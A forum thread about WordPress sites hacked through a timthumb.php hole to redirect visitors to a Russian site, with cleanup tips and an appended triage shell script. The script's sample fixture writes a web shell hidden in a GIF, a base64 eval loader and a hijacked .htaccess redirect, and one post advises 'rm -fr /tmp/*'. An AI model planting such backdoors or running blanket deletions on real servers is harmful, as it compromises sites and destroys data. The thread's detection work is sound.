3.3.1 Hacked by saveprefs.ru redirect
-
Hi everyone, I have just been hacked. I am a web developer, and have about 20-30 WordPress sites, all of them running 3.3.1. They all seem to have been hacked. Here’s one you can look at, if you search google for harmonyhomes.net and click on the link from Google, you will see that it goes to https://saveprefs.ru/astro/index.php first then to msn.ca. Can anyone please help me find the code? I really don’t want to have to try to restore all my sites from backups.
Thank you all.
Jamie
-
with
sudo grep -r turnitupnow * > badfiles.txt
I found A LOT more of this!
One additional step to add to @wpv-expert’s post:
Be sure to check your development system for malware. One of the easiest entry points for this is a compromised Windows system. Key loggers and other similar malware allow the hacker to steal your FTP password.
Never use a Windows PC for both casual surfing using IE and FTP to production sites. It’s better to have an intermediary machine running Linux that you save your code to, test it and then upload it to the production server.
/peter
Looks like my problem was caused by another domain on the same server, that got hacked. Simply chmodding my root folder did the trick…
It’s always the hardest when a simple solution is right in front of you…
Another one hacked with the same bad thing here. 5 WordPress installations on one shared hosting account (iPage).
It’s been 2 days that I’ve been looking for a solution to this nasty hack.
After reading many posts in various places and trying to find a solution, I finally think I managed to stop the .htaccess rewrite thing from happening every half an hour or so. This is what I did:
1. The first thing I did was to download all my files from the server into a backup dir on my PC and to make database backups of the 5 WordPress installations on my server. There were 30000+ files, but it was worth the downloading.
2. Next I ran a file search on my backup dir for the “_cache.php” file mentioned in many posts I read. It was found in only one WordPress installation in “/wp-content/uploads”. I deleted it from the server.
3. The next thing I did was to file search the backup dir for all “timthumb.php” instances. There were many in themes and also in plugins (ubermenu, featured posts with thumbnails etc…).
4. I deleted all unused themes and plugins and all instances of “timthumb.php”.
5. Reinstalled all 5 WordPress installations with fresh ones with the auto reinstall from the admin update menu.
6. Deleted all “.htaccess” files from the five sites, replaced them with fresh ones and chmodded them to 444 (as “Tehranshahr” suggested here). I also included the 404 redirect code the user “impact” posted earlier here.
Now it’s been more than an hour and a half and the “.htaccess” rewrite thing seems to have stopped. I’m praying that this is it for now.
p.s. First I was using a basic FTP connection, but now I switched my settings to SFTP. I changed my password before that with a really strong one, as it was mentioned that these attacks may be so successful due to weak FTP passwords.
bizarotrips, which version of wordpress are you using? which plugins do you have installed?
I work as a malware analyst and most WordPress hacks that I have seen are due to vulnerabilities within third-party plugins.
In one particular instance the user had installed a plugin (latest version), but it hadn’t been updated by the developer in months, even after the vulnerability had been posted all over the net.
Go over what you have installed, and search the net to determine if there are any exploits published for the plugins that you use.
Also check out Better WP. It works pretty good, when it comes to utilizing best practices in regards to WP security.
This was just brought to my attention…
If you are at your wits’ end trying to get your site back on track, these guys will do it for like 100 bucks or something like that.
UPDATE: My sites are up and running OK without any redirection in the “.htaccess” files since my last post. I’m almost sure that in my case it was the “timthumb.php” exploit that was used. @j0hnnyb0y all my WP installs are 3.3.1.
About the plugins… it’s a more complicated thing, because I’ve installed so many plugins on one of my sites for research purposes that it’s very hard for me to find out which one of them may have caused this vulnerability. As I posted before, I’ve downloaded all the files from my server directory (just 5 WordPress installs – 30000+ files) so I will have the time to check everything that could have caused this s**t.
I’m pretty sure that many of my files still contain some unwanted scripts injected, so I’m gonna investigate that further.
p.s. the “https://sitecheck.sucuri.net” still gives me warnings for some of the files in my WP installs… One of them is “init2.php” which was in one of my thumbnail directories. This I connect again with the “timthumb.php” thing.
I am now using this WP plugin “TimThumb Vulnerability Scanner” By Peter Butler on any new site or plugin I install. Seems to work ok, not sure it is updating the script properly, but at least it identifies any timthumbs that are out of date and not secure and I can update them manually.
I was hacked too, they created 4 folders: lastnews, newsjournal, curretevents and breakingnews, each one with 100 names, each one with one .htaccess that redirected to a Russian site.
Then they sent thousands of spam mails linking to those files. The only script I have on that domain is WordPress!
I deleted the folders but they appeared later, so now I leave the folders there but I changed the permission so no one can access them.
But I’m still worried; my server provider wants to know what happened, and I really don’t know.
@roro what’s your domain?
Hi,
Where is the problem now, in timthumb.php or in WP 3.3.1?
Thanks.
Mr Badr, for me it was timthumb.php, and not 3.3.1. There is a plugin that I suggest you use called “TimThumb Vulnerability Scanner” By Peter Butler. It will scan all your files and tell you if you have a timthumb script that is open to attack.
All the best,
Jamie
This timthumb hack caused havoc about half a year ago. Apparently they found a new vulnerability, or all of you didn’t switch to better coded plugins after that havoc.
https://wpcandy.com/reports/timthumb-security-vulnerability-discovered
Badr, the last time there was a large exploit of WordPress itself was years back. When you make sure to always have the latest WP, the things to look at for security are plugins, server settings, passwords, etc.
@p-mt, sorry for late response, was busy last week …
sudo grep -r turnitupnow * > badfiles.txt
is good, but…
Do you know that:
1. PHP can be easily embedded in gif, jpg, png, mp3, wav… ?
2. A lot of plugins after unpacking have executable rights on gif, jpg, png, txt files, which can be executed as CGI in this case?
Always cure them with the help of
find ./ -type d -exec chmod -vv 755 {} \;
find ./ -type f -exec chmod -vv 644 {} \;
3. A bunch of installations have 777 permissions on the whole wp-content folder instead of restricting it to “upload” only? (The best choice would be to remove ANY folders writable by the HTTP server outside DOCUMENT_ROOT, as is possible to do with other CMSes, but changing it in WordPress is a challenge)
4. Almost any HTTP server allows write permissions to /tmp, which is the most loveable place for any backdoor?
5. Most servers have bash, gawk… base utilities which can be called by anyone and can be easily used as a backdoor channel (so no need to keep anything on servers cuz it is always available), and any trace of activity will be logged on hosting?
Well, there are a lot of scary things that are out of your control if you don’t run your own server. Hackers rarely infect systems in the old-fashioned way. They usually keep spare ways to reactivate themselves after their visible stuff was detected and deleted. Spare ways could be anywhere: in database triggers, inside images or mp3 files (which are actually always exposed by WordPress to the world)… etc.
To be sure that you take care of at least your part of the software, check ALL your files that are exposed by the HTTP server with these simple commands (change directory to the root of the HTTP-accessible tree, aka DOCUMENT_ROOT):
# Check if some files are trying to obfuscate themselves
find . -type f -print0 | xargs -0 grep -i base64 > ../000-obfuscation.txt
# Check for links to external sites
# Especially pay attention if it is in php files
find . -type f -print0 | xargs -0 grep -E '\<[[:alpha:]]+://[^/]*' > ../001-external_links_in_urls.txt
# Review potentially malicious content
find . -type f -print0 | xargs -0 grep -Ei 'iframe|src|javascript:|eval|include' > ../002-active_content.txt
# Delete anything in the temporary folder that was created by your
# account. (Don’t worry that you may delete others’ files,
# /tmp has the sticky bit set on most servers, so you can not delete
# files that were created by others)
rm -fr /tmp/* ;
Dump the MySQL database so it will be possible to parse it as a single text file and search for the same keywords inside it.
Well, there is no universal advice because of the different environments on servers, and the situation heavily depends on what type of plugins/themes you use (BTW, don’t keep deactivated plugins/themes since they are still callable from outside, and if someone finds a hole he/she will be able to use it).
Best regards,
Alex
Hi all,
One of our clients has reported the same problem. It was a shared hosting account with multiple WordPress installations. We have cleared all the installations to make sure no ‘back door was opened’.
I have seen here that some users problem persisted despite following all instructions outlined above.
I just wanted to point out that you should not forget to replace the .htaccess file which is located outside the www/public_html root.
You will have a .htaccess file there as well. If it was infected (overwritten), no matter how hard you look for malicious files in your websites the problem will persist.
Also start using SFTP.
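The checks scattered through the thread (PHP hidden in image and media files, executable bits and 777 directories in wp-content, eval/base64 loaders, the known file names _cache.php, init2.php and timthumb.php, and .htaccess redirects including the .htaccess above public_html) pulled together into one read-only triage script. This is an added example, not code from the thread, from WordPress or from any poster; the finding tags, the file-name list, the decoder-function list and the constructed sample account tree are my own assumptions.

```shell
#!/bin/sh
# Added example, not code from the thread: a read-only triage scan over a
# hosting account that holds one or more WordPress installs. It reports
# findings as "TAG<tab>path" lines and deletes nothing; review each hit by hand.

# scan_tree ROOT: run every check below and print one line per finding.
scan_tree() {
    root="$1"

    # 1. PHP hidden in files that should never hold code (gif, jpg, png, txt, mp3, wav).
    find "$root" -type f \( -iname '*.gif' -o -iname '*.jpg' -o -iname '*.jpeg' \
        -o -iname '*.png' -o -iname '*.txt' -o -iname '*.mp3' -o -iname '*.wav' \) \
        -exec grep -l -- '<?php' {} + 2>/dev/null |
    while IFS= read -r f; do printf 'MEDIA_PHP\t%s\n' "$f"; done

    # 2. Regular files with the owner execute bit (plugin archives often unpack that way).
    find "$root" -type f -perm -100 |
    while IFS= read -r f; do printf 'EXEC_BIT\t%s\n' "$f"; done

    # 3. World-writable directories (the "777 on all of wp-content" case).
    find "$root" -type d -perm -002 |
    while IFS= read -r d; do printf 'WORLD_WRITABLE\t%s\n' "$d"; done

    # 4. Classic obfuscated loaders: eval( wrapped around a decoder call (assumed list).
    find "$root" -type f -iname '*.php' -exec grep -lE \
        'eval[[:space:]]*\([[:space:]]*(base64_decode|gzinflate|gzuncompress|str_rot13)' {} + 2>/dev/null |
    while IFS= read -r f; do printf 'OBFUSCATED\t%s\n' "$f"; done

    # 5. .htaccess rules that redirect to an absolute URL. Pass the account root
    #    (the parent of public_html) as ROOT so the .htaccess above the docroot is covered.
    find "$root" -type f -name '.htaccess' -exec grep -lE \
        '^[[:space:]]*(RewriteRule|Redirect(Match)?)[[:space:]].*https?://' {} + 2>/dev/null |
    while IFS= read -r f; do printf 'HTACCESS_REDIRECT\t%s\n' "$f"; done

    # 6. File names the thread associates with this compromise (assumed list; extend it).
    find "$root" -type f \( -name '_cache.php' -o -name 'init2.php' -o -name 'timthumb.php' \) |
    while IFS= read -r f; do printf 'KNOWN_NAME\t%s\n' "$f"; done
}

# count_findings TAG ROOT: number of findings carrying TAG.
count_findings() {
    scan_tree "$2" | awk -F '\t' -v tag="$1" '$1 == tag' | wc -l | tr -d ' '
}

# make_sample_tree DIR: a constructed account layout (not a real site) to exercise the scan.
make_sample_tree() {
    base="$1"
    mkdir -p "$base/public_html/wp-content/uploads" "$base/public_html/wp-content/themes/t"
    # backdoor disguised as an image, later given an executable bit
    printf 'GIF89a<?php eval($_POST["c"]); ?>\n' > "$base/public_html/wp-content/uploads/logo.gif"
    # base64 loader dropped under uploads, named like the one posters found
    printf '<?php eval(base64_decode("aGVsbG8="));\n' > "$base/public_html/wp-content/uploads/_cache.php"
    # a harmless stand-in timthumb.php: flagged by name only
    printf '<?php echo "thumb";\n' > "$base/public_html/wp-content/themes/t/timthumb.php"
    # hijacked .htaccess above the docroot: referer-conditional redirect to an external host
    printf 'RewriteEngine On\nRewriteCond %%{HTTP_REFERER} google\nRewriteRule .* http://example.invalid/x.php [R,L]\n' \
        > "$base/.htaccess"
    # ordinary WordPress .htaccess inside the docroot
    printf 'RewriteEngine On\nRewriteRule ^index\\.php$ - [L]\n' > "$base/public_html/.htaccess"
    find "$base" -type d -exec chmod 755 {} +
    find "$base" -type f -exec chmod 644 {} +
    chmod 755 "$base/public_html/wp-content/uploads/logo.gif"
    chmod 777 "$base/public_html/wp-content"
}

# Stand-alone demo on the constructed tree; on a real account run: scan_tree /home/youraccount
demo_dir=$(mktemp -d)
make_sample_tree "$demo_dir"
scan_tree "$demo_dir"
rm -rf "$demo_dir"
```

Run it against a copy of the whole account directory (the parent of public_html), not just the WordPress folder, so the outer .htaccess and anything parked beside the docroot are included; every line it prints is something to open and read, not something to delete blindly, and a clean report only says these particular patterns were absent.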